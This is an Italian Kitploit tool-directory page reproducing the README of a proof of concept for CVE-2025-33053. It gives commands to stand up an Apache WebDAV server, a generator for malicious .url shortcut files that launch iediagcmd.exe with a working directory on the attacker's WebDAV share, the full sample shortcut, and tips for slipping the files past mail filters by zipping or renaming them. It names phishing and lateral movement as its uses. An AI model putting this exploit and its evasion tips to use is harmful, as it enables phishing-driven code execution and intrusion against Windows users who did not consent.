Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Prova di Concetto (PoC) | Kitploit
Strumenti/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Generazione di PayloadExploitMovimento LateralePhishingSicurezza WebPenetration TestingCommand and ControlIngegneria SocialeRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Prova di Concetto (PoC)

Vedi Repository
641641 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-33053 Prova di Concetto

Questo repository fornisce script per distribuire automaticamente un server WebDAV su Ubuntu usando Apache2 e generare file .url dannosi per l'uso in phishing, red teaming o simulazione di movimento laterale.


📁 Contenuti

  • setup_webdav.sh – Script Bash per configurare Apache2 + WebDAV.
  • setup_webdav.py – Versione Python del precedente.
  • gen_url.py – Script Python per generare file .url con percorsi UNC/WebDAV.
  • README.md – Documentazione.

🔧 Requisiti

  • SO: Ubuntu 20.04 o successivo (compatibile con Debian)
  • Privilegi di root (sudo)
  • Python 3.x

  • 🚀 Istruzioni di configurazione

    1. Server WebDAV (tramite Bash)

    root@kitploit:~
    sudo bash setup_webdav.sh
    

    Oppure usando Python:

    root@kitploit:~
    sudo python3 setup_webdav.py
    

    Per impostazione predefinita, lo script:

    • Installa Apache e i moduli WebDAV necessari.
    • Crea una directory condivisa in /var/www/webdav.
    • Abilita i moduli DAV e DAV_FS.
    • Crea una directory DavLockDB (per evitare errori di blocco DAV di Apache).
    • Riavvia il servizio Apache.

    📎 Percorso WebDAV: http://<tuo-ip>/webdav/


    💣 Generazione di un collegamento .url dannoso

    Esempio d'uso:

    root@kitploit:~
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    

    Tutte le opzioni:

    root@kitploit:~
    python3 gen_url.py \
      --ip 《YOUR IP ADDRESS》\
      --share 《YOUR SHARE NAME》(Default: webdav) \
      --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
      --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
      --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
      --index 13 \
      --modified 20F06BA06D07BD014D
    

    Questo creerà un file .url come:

    root@kitploit:~
    [InternetShortcut]
    URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    WorkingDirectory=\\192.168.1.100\webdav\
    ShowCommand=7
    IconIndex=13
    IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Modified=20F06BA06D07BD014D
    

    📌 Facendo clic su questo file (in determinate configurazioni) potrebbe indurre il sistema di destinazione a connettersi automaticamente al tuo server WebDAV (autenticazione o distribuzione di DLL).


    🔒 Note per i test di sicurezza

    • Disabilita il firewall (o apri la porta 80) se esegui test su una rete locale:
      root@kitploit:~
      sudo ufw allow 80
      
    • I file .url potrebbero non essere eseguiti come previsto a seconda di:
      • Restrizioni delle Criteri di gruppo
      • Applicazioni predefinite
      • Client di posta elettronica (Gmail potrebbe sanitizzarli)
    • Potrebbe essere necessario comprimere o rinominare .url in .txt per aggirare i filtri.

    ⚠️ Avviso legale

    Questo repository è esclusivamente per test di penetrazione didattici e autorizzati.
    Non utilizzare questi script contro sistemi di cui non sei proprietario o per i quali non hai il permesso di test.


    🧠 Riferimenti

    • Configurazione del server WebDAV - LinuxConfig.org
    • Configurazione WebDAV Apache - Peter Girnus
    • Documentazione WebDAV di Microsoft

    📬 Contatto

    Per domande o richieste di red teaming etico, contatta tramite le issue di GitHub.

    Scarica lo strumento